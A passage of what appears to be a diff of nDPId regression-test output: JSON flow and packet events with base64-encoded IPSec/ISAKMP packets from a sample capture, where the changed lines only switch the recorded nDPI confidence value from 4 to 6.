xcSAbrX\/01ANR\/PfYh\/i++s8e32ZnYFWqCyTSg5CBOpjqBxCXLuhDpjFn3tG\/pppyqmTbc9xPFbJ2D5"} -00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":310,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.131","src_port":14500,"dst_port":4500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":310,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.131","src_port":14500,"dst_port":4500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00729{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":311,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":250,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":250,"pkt_l4_len":216,"thread_ts_msec":946763527783,"pkt":"YDjgxTWgeJS0JASgCABFAADs4h0AAPcR9GVt7buDwKgCZBGUOKQA2PzYAAAAACmGibu7DGYryhiyRAKATQQuICMgAAAAAQAAAMwkAACwqEBhGEkqTdk3OTJPVU+8yQTL8ZItLKounZsHCBXq6ysubqRk784GH\/owxO8EPqA9YbqFV54i4f05kBjS\/h8TdhcTet4lsitEO51fkiGfi0Vkc\/JI\/IrO1ZHnZGEeZHi6F6lpw7gAiKLzX7vKrdLCPx0wmSU9lwFSDsrE8LnuV3pSiACEa4nL+ragW0aQZ1MjWWNA\/UYXgaAtNOt3nz2vBhdfjv1epMHdb4oW+Q=="} 00596{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":312,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":946763527783,"pkt":"eJS0JASgYDjgxTWgCABFAACMzoVAAD8RgF7AqAJkbe27gzikEZQAeI6gAAAAACmGibu7DGYryhiyRAKATQQuICMIAAAAAgAAAGwwAABQ7i9ltNSVoV2B7+spzMyxdFmVFpNCdGsnS1zYOWtZLLJ3jn5hta9uxbRTOuryQ1nfs8LoZe2STMzHnZYYlmsTR8H0L25CA7tIlvnPbQ=="} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":325,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":325,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":818,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":818,"pkt_l4_len":784,"thread_ts_msec":946763527783,"pkt":"eJS0JASgYDjgxTWgCABFAAMkFTBAAD8RNt7AqAJkbe27wSkEAfQDEEHkDC7fJGbFXWMAAAAAAAAAACEgIggAAAAAAAADCCIAAggCAABQAQEACAMAAAwBAAAMgA4AgAMAAAwBAAAMgA4BAAMAAAgDAAACAwAACAMAAAwDAAAIAgAAAgMAAAgCAAAFAwAACAQAAAIAAAAIBAAABQAAAbQCAQAuAwAACAEAAAMDAAAMAQAADIAOAIADAAAMAQAADIAOAMADAAAMAQAADIAOAQADAAAMAQAADYAOAIADAAAMAQAADYAOAMADAAAMAQAADYAOAQADAAAMAQAAEoAOAIADAAAMAQAAEoAOAMADAAAMAQAAEoAOAQADAAAMAQAAE4AOAIADAAAMAQAAE4AOAMADAAAMAQAAE4AOAQADAAAMAQAAFIAOAIADAAAMAQAAFIAOAMADAAAMAQAAFIAOAQADAAAIAwAAAQMAAAgDAAACAwAACAMAAAUDAAAIAwAADAMAAAgDAAANAwAACAMAAA4DAAAIAgAAAQMAAAgCAAACAwAACAIAAAQDAAAIAgAABQMAAAgCAAAGAwAACAIAAAcDAAAIBAAAAgMAAAgEAAAFAwAACAQAAA4DAAAIBAAADwMAAAgEAAAQAwAACAQAABIDAAAIBAAAEwMAAAgEAAAUAwAACAQAABUDAAAIBAAAFgMAAAgEAAAXAwAACAQAABgDAAAIBAAAGQMAAAgEAAAaAwAACAQAABsDAAAIBAAAHAMAAAgEAAAdAAAACAQAAB4oAACIAAIAAO96XcY24ptDFni41yYdWJy\/JFU551AW7MyoUJsnnIFWRTt8Hp07Dm7IvhAdkO6fUAM\/X+LZb+GheG49xaJX4ZpDDw\/MVu9lKUJuuFxBcJD0gviRwYWDrDJAeloJzwIl88n9jiNXQaFXBtKBWnfoC\/pQwJ70quZAfVGTIXarTofpKQAAJEiOJbzbqJu93mWlhlAfM\/c4hyE2\/vYAR2i8uJ7W5MEqKQAAHAAAQATSOs\/buyb4UkO\/79vj\/opzawTOeAAAABwAAEAF9FH7yboKURb0ASubrkp\/zwruocY="} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":325,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":10500,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":325,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":10500,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":326,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":946763527783,"pkt":"YDjgxTWgeJS0JASgCABFAABQIusAAPcRs\/Zt7bvBwKgCZAH0KQQAPCbzDC7fJGbFXWMAAAAAAAAAACkgIiAAAAAAAAAANAAAABgAAEAGAAFV7sh5\/22ST31yX0r43Q=="} 01523{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":327,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":842,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":842,"pkt_l4_len":808,"thread_ts_msec":946763527783,"pkt":"eJS0JASgYDjgxTWgCABFAAM8FVVAAD8RNqHAqAJkbe27wSkEAfQDKFK8DC7fJGbFXWMAAAAAAAAAACkgIggAAAAAAAADICEAABgAAEAGAAFV7sh5\/22ST31yX0r43SIAAggCAABQAQEACAMAAAwBAAAMgA4AgAMAAAwBAAAMgA4BAAMAAAgDAAACAwAACAMAAAwDAAAIAgAAAgMAAAgCAAAFAwAACAQAAAIAAAAIBAAABQAAAbQCAQAuAwAACAEAAAMDAAAMAQAADIAOAIADAAAMAQAADIAOAMADAAAMAQAADIAOAQADAAAMAQAADYAOAIADAAAMAQAADYAOAMADAAAMAQAADYAOAQADAAAMAQAAEoAOAIADAAAMAQAAEoAOAMADAAAMAQAAEoAOAQADAAAMAQAAE4AOAIADAAAMAQAAE4AOAMADAAAMAQAAE4AOAQADAAAMAQAAFIAOAIADAAAMAQAAFIAOAMADAAAMAQAAFIAOAQADAAAIAwAAAQMAAAgDAAACAwAACAMAAAUDAAAIAwAADAMAAAgDAAANAwAACAMAAA4DAAAIAgAAAQMAAAgCAAACAwAACAIAAAQDAAAIAgAABQMAAAgCAAAGAwAACAIAAAcDAAAIBAAAAgMAAAgEAAAFAwAACAQAAA4DAAAIBAAADwMAAAgEAAAQAwAACAQAABIDAAAIBAAAEwMAAAgEAAAUAwAACAQAABUDAAAIBAAAFgMAAAgEAAAXAwAACAQAABgDAAAIBAAAGQMAAAgEAAAaAwAACAQAABsDAAAIBAAAHAMAAAgEAAAdAAAACAQAAB4oAACIAAIAAO96XcY24ptDFni41yYdWJy\/JFU551AW7MyoUJsnnIFWRTt8Hp07Dm7IvhAdkO6fUAM\/X+LZb+GheG49xaJX4ZpDDw\/MVu9lKUJuuFxBcJD0gviRwYWDrDJAeloJzwIl88n9jiNXQaFXBtKBWnfoC\/pQwJ70quZAfVGTIXarTofpKQAAJEiOJbzbqJu93mWlhlAfM\/c4hyE2\/vYAR2i8uJ7W5MEqKQAAHAAAQATSOs\/buyb4UkO\/79vj\/opzawTOeAAAABwAAEAF9FH7yboKURb0ASubrkp\/zwruocY="} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":329,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01550{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":329,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":858,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":858,"pkt_l4_len":824,"thread_ts_msec":946763527783,"pkt":"eJS0JASgYDjgxTWgCABFAANMFV1AAD8RNonAqAJkbe27wTikEZQDOEjvAAAAAAwu3yRmxV1jIFciNwR80qEuICMIAAAAAQAAAywjAAMQrTNm3y3nKpCfJGJLzq4WoeJCKiySVfARcaLVldW1nV8TarpHf45O4kn4P088BsGCuvuuV3Zjz7HvPeNDTTMf4tTEEbFO+pYNIajmLo\/0MCdGjy6TTcKRfaV2HKNOGA9rBOzUgyRNBSth+rMnuxISK3JPGHdog7GxqUEvnYZJv6OzC4fGLuCnL5wy\/L50Ty2Fg3pvXIrsXaUHwli0W3VEs+M1\/AyVdowUZu\/IsLptb5Ywqx9mamanagQbw5+zJI6IIdw7nr9xWaabNoFd49XPf5IOG0oN81cMtm9wKEcZ8ixoF+L82gwp\/pYH0lK\/bbEcVFjhVpZ\/f\/MVtxKixJVEEdvADpZTg8O4Zlk7jT54AIXHlN6rEhLhrajMocSyvUhC7BimUe32xEJLcQZKXjv3wCg7FDRUEpqPxnsTiyog8Li9OE293W7JmcZVk15cFNneXQ70VpAS6qFWcmJDLFGIuHQn2e8F\/tOfKsjkEU9CRQvRNWk\/D+p8puFicnw0V9LRUy6uGLZxVhIGKS53neDw2kl7mBLLFGMep8mYh\/EO\/\/43jUD056pVqWMold3bWe+ENXpplt8rNUMdHP1gpUwXVXsuMG4JxEVoRS2kuRVOk+0MZSR0qWpix3lng4UvvIbUsH8LOmBG0LvWOPT+Y2\/vxk5QUXqsL7dKfHnf8S3qaEHIUYxj1fc3KS2BlJd3Cv+gtlVL0IzPondNSkBm3bTpLJzQAh82sInj5YGm24c1BN6ris3aym186S4CJNZ85t61td5r84KOzzlhZI\/8gthnkxJqfxAy56DReSYyVqZI3gKtdvFc+11TbVGwphGoKye6DcPPG6R9j5t6QYfYlqD1YMGmUiJZY8P2i8xB6AZFkNfgz1lgyuFNARXzCvbzdpuAqBpg9IgGpIoSzktXS+oIlZWHBtFqi5IM4urBJvoIxQ\/LOftR\/3RCCtLHSIF92B0NV1hTbSxyXobFKVDbyTqen4hmkqrNSj3NAInd6rAKd2PiJHYKSGR5o18lKUM23CRw+\/1tANxXoFAkW1x1"} -00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":329,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":14500,"dst_port":4500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":329,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":14500,"dst_port":4500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00726{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":330,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":250,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":250,"pkt_l4_len":216,"thread_ts_msec":946763527783,"pkt":"YDjgxTWgeJS0JASgCABFAADsI9UAAPcRsnBt7bvBwKgCZBGUOKQA2AuLAAAAAAwu3yRmxV1jIFciNwR80qEuICMgAAAAAQAAAMwkAACwdm4ZqCn08scaTnuI9jZrtMOzwvKgCzLssEi17hqLdF52wfrjwlGnWHg4s7Htz\/Gxnh\/s0RPdhVSIN6eLY0tie04uvE5BsloxH7yxzkeCVrt16zA+hjPcXUPmxiTk9zs8awO3ouDCi50PL7v1Djwqke5YKqZs31YlwMVpuMXvtjQmPgylOFFjn44ZNCyP+ZBH4qdQEdwueJNrpZ2EQ7a1r8i7f8xHxKHHyczyEw=="} 00599{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":331,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":946763527783,"pkt":"eJS0JASgYDjgxTWgCABFAACMFclAAD8RON3AqAJkbe27wTikEZQAeDIOAAAAAAwu3yRmxV1jIFciNwR80qEuICMIAAAAAgAAAGwwAABQVYMVSYyJ9gFWH7kETb2fU7dCYGW\/nqvCy2sJP\/JPQTMkiwZXC67JYZ\/uOaJ7kC8TcwUVknprrjkRxrCJVq1wLiNMXgpKaYe8r38Unw=="} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":344,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.227","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":818,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":818,"pkt_l4_len":784,"thread_ts_msec":946763527783,"pkt":"eJS0JASgYDjgxTWgCABFAAMkqOlAAD8RowLAqAJkbe274ykEAfQDEMfwxPeugZRTkDEAAAAAAAAAACEgIggAAAAAAAADCCIAAggCAABQAQEACAMAAAwBAAAMgA4AgAMAAAwBAAAMgA4BAAMAAAgDAAACAwAACAMAAAwDAAAIAgAAAgMAAAgCAAAFAwAACAQAAAIAAAAIBAAABQAAAbQCAQAuAwAACAEAAAMDAAAMAQAADIAOAIADAAAMAQAADIAOAMADAAAMAQAADIAOAQADAAAMAQAADYAOAIADAAAMAQAADYAOAMADAAAMAQAADYAOAQADAAAMAQAAEoAOAIADAAAMAQAAEoAOAMADAAAMAQAAEoAOAQADAAAMAQAAE4AOAIADAAAMAQAAE4AOAMADAAAMAQAAE4AOAQADAAAMAQAAFIAOAIADAAAMAQAAFIAOAMADAAAMAQAAFIAOAQADAAAIAwAAAQMAAAgDAAACAwAACAMAAAUDAAAIAwAADAMAAAgDAAANAwAACAMAAA4DAAAIAgAAAQMAAAgCAAACAwAACAIAAAQDAAAIAgAABQMAAAgCAAAGAwAACAIAAAcDAAAIBAAAAgMAAAgEAAAFAwAACAQAAA4DAAAIBAAADwMAAAgEAAAQAwAACAQAABIDAAAIBAAAEwMAAAgEAAAUAwAACAQAABUDAAAIBAAAFgMAAAgEAAAXAwAACAQAABgDAAAIBAAAGQMAAAgEAAAaAwAACAQAABsDAAAIBAAAHAMAAAgEAAAdAAAACAQAAB4oAACIAAIAALaCq\/QqzbUl4TfVDbWtcIRhWbw1c7xzhe471e2uourx4gK4yu\/qx\/GMXpPCmq+AfIfCRxyfNb4eRtQdBek4+utR7rvvK74A9iefLvlsEBGQs3U+sNqUk9a13Hk+LhSeZopenNjNGBCXlMHDJtGZQCjGlhOR9N57RZan1wqNSI8CKQAAJK7\/+nXDLTKRQBD8OLeC6WRl3oX4ocuiIUqLdUtxFTBTKQAAHAAAQASCMP3w8Pive3ai2x+IuNuOWp8BpgAAABwAAEAFhhuQtn334e4kKy6crkOBRJ7fU3o="} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":344,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.227","src_port":10500,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":344,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.227","src_port":10500,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":946763527783,"pkt":"YDjgxTWgeJS0JASgCABFAABQy0gAAPcRC3dt7bvjwKgCZAH0KQQAPOj3xPeugZRTkDEAAAAAAAAAACkgIiAAAAAAAAAANAAAABgAAEAGAAE1IEHINlsQhrJ2YmIIdA=="} 01516{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":346,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":842,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":842,"pkt_l4_len":808,"thread_ts_msec":946763527783,"pkt":"eJS0JASgYDjgxTWgCABFAAM8qPJAAD8RouHAqAJkbe274ykEAfQDKINyxPeugZRTkDEAAAAAAAAAACkgIggAAAAAAAADICEAABgAAEAGAAE1IEHINlsQhrJ2YmIIdCIAAggCAABQAQEACAMAAAwBAAAMgA4AgAMAAAwBAAAMgA4BAAMAAAgDAAACAwAACAMAAAwDAAAIAgAAAgMAAAgCAAAFAwAACAQAAAIAAAAIBAAABQAAAbQCAQAuAwAACAEAAAMDAAAMAQAADIAOAIADAAAMAQAADIAOAMADAAAMAQAADIAOAQADAAAMAQAADYAOAIADAAAMAQAADYAOAMADAAAMAQAADYAOAQADAAAMAQAAEoAOAIADAAAMAQAAEoAOAMADAAAMAQAAEoAOAQADAAAMAQAAE4AOAIADAAAMAQAAE4AOAMADAAAMAQAAE4AOAQADAAAMAQAAFIAOAIADAAAMAQAAFIAOAMADAAAMAQAAFIAOAQADAAAIAwAAAQMAAAgDAAACAwAACAMAAAUDAAAIAwAADAMAAAgDAAANAwAACAMAAA4DAAAIAgAAAQMAAAgCAAACAwAACAIAAAQDAAAIAgAABQMAAAgCAAAGAwAACAIAAAcDAAAIBAAAAgMAAAgEAAAFAwAACAQAAA4DAAAIBAAADwMAAAgEAAAQAwAACAQAABIDAAAIBAAAEwMAAAgEAAAUAwAACAQAABUDAAAIBAAAFgMAAAgEAAAXAwAACAQAABgDAAAIBAAAGQMAAAgEAAAaAwAACAQAABsDAAAIBAAAHAMAAAgEAAAdAAAACAQAAB4oAACIAAIAALaCq\/QqzbUl4TfVDbWtcIRhWbw1c7xzhe471e2uourx4gK4yu\/qx\/GMXpPCmq+AfIfCRxyfNb4eRtQdBek4+utR7rvvK74A9iefLvlsEBGQs3U+sNqUk9a13Hk+LhSeZopenNjNGBCXlMHDJtGZQCjGlhOR9N57RZan1wqNSI8CKQAAJK7\/+nXDLTKRQBD8OLeC6WRl3oX4ocuiIUqLdUtxFTBTKQAAHAAAQASCMP3w8Pive3ai2x+IuNuOWp8BpgAAABwAAEAFhhuQtn334e4kKy6crkOBRJ7fU3o="} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":348,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.227","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01549{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":348,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":858,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":858,"pkt_l4_len":824,"thread_ts_msec":946763527783,"pkt":"eJS0JASgYDjgxTWgCABFAANMqP1AAD8RosbAqAJkbe274zikEZQDOAwPAAAAAMT3roGUU5AxVDreTwHgKMguICMIAAAAAQAAAywjAAMQFHKN09w9JMuSdVLZlDSAEdBZPZLf0YlLUCDGVaU4QgA5R4PwVc1wGlnCVUekrSEI8G+hJ73vPBs9A2R54slBgUkD5OtsgkU2Y\/ysdvbeFjfl5aOOU8P2AP0+nE4nxoL3ihUJF\/r5A8\/qioOtIJzpb7UTY7FEOHgakNDQyZ9vaAwZXlWs41+Th6nJ0MpAQLpgozSOJ9FAzZeaM0eBMdzcI2Q4S0GkesbeAgagn\/f2DKDyFAKLBtf6MJ1vlQ54CVKtTzUaZfkrk6hU4syCkcLZNoFIb1mnNiDsPxk32uw0XmKLZ4AB5DJWse1LYivWsOqVJqqjMO3HhnEG2Dx5awhDcFxp60atvgtj6L6XoPvOgq\/qXj\/z5PXlZQkAJAp+cZbmGSvhVgatLb0+tsz\/OyULncHx\/VO6Kqi9P+MAPAxEZC9A\/95WSldUKrkqHiz8sZsukvkW1AZ0rEqkgeazDwoZXjpNDR3XGIO7jwp4VRlinrEP+Kowk20+gIBA8+dHAOiz9florZrS3Uj1s+5mTjawwBtWbyf1VjJgr\/78WCw6ONAmxOiC+FJX9fBcH9xN6I1X3K8ABoYfUvOOT02L+JNLD2qEVfwPyjGhr3UARSE6l2T2B8959OepMY6co3ui9z1UXnahE0GR9i2pLhrDW4mTskfgGwmp\/68Y1BDrCYB39Y0AhqU4uZZHrB0pR6SpVR1EP2KSVRgkwvgbrOUep+9Vt7GRB5bao9BCnpTL7AEOqOwhIgx5ynAqJES\/eCKH\/kwRYj4USVpn52VpEg9ILhoE+urAKkETY\/cLVH4Ak5ugCbOEfPdHfj9D0rGeNiWqOShVrPj2Mq3v0Zfwkhsyk74blWlkAR2RmgMcM23i58MXkQ0U+VJXSAEguUMhvfDjmZv6lKz84CphJcLPMSj84HVTd9wWCLF6tkZx7q3+E50I6mOu\/OpnQrsLV4\/HbMMztvL4nGxR1fiQo\/Tmpi848uW5uwvfyfq2cIAXQIsRkAi6L9PFk7Wdod7gdoBv9qnMuYyOxSYvFaApLUSPsZnf"} -00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":348,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.227","src_port":14500,"dst_port":4500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":348,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.227","src_port":14500,"dst_port":4500,"l4_proto":"udp","ndpi": 